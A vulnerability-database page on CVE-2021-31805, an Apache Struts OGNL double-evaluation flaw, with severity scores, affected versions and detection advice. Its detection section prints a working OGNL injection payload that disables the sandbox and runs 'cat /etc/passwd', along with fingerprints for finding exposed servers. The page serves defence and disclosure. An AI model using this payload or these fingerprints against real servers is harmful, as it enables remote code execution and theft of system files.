cbcvebase.
CVE-2021-31805
published 2022-04-12

CVE-2021-31805: The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.31%
99.7th percentile
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

Affected

1 ranges
VendorProductVersion rangeFixed in
apachestruts2.0.0 – 2.5.29

Detection & IOCsextracted from sources · hover to see the quote

command%{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) }
  • Exploit is delivered via HTTP POST with multipart/form-data body; the OGNL payload is injected into a form field (e.g., 'id') using the %{...} forced-evaluation syntax. Monitor for multipart POST requests containing OGNL expressions with BeanMap, memberAccess, excludedPackageNames, excludedClasses, or InstanceManager references.
  • The payload abuses 'freemarker.template.utility.Execute' instantiated via 'org.apache.tomcat.InstanceManager' to achieve RCE. Alert on any OGNL expression referencing these class names in HTTP request bodies.
  • Shodan/FOFA fingerprints for exposed Struts2 instances: search for HTTP HTML containing 'apache struts', page title 'struts2 showcase', or HTML containing 'struts problem report'.
  • The exploit bypasses OGNL sandbox by zeroing out 'excludedPackageNames' and 'excludedClasses' via BeanMap reflection chain — a pattern shared with S2-061 (CVE-2020-17530). Detections for S2-061 payloads should be extended to cover this variant.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.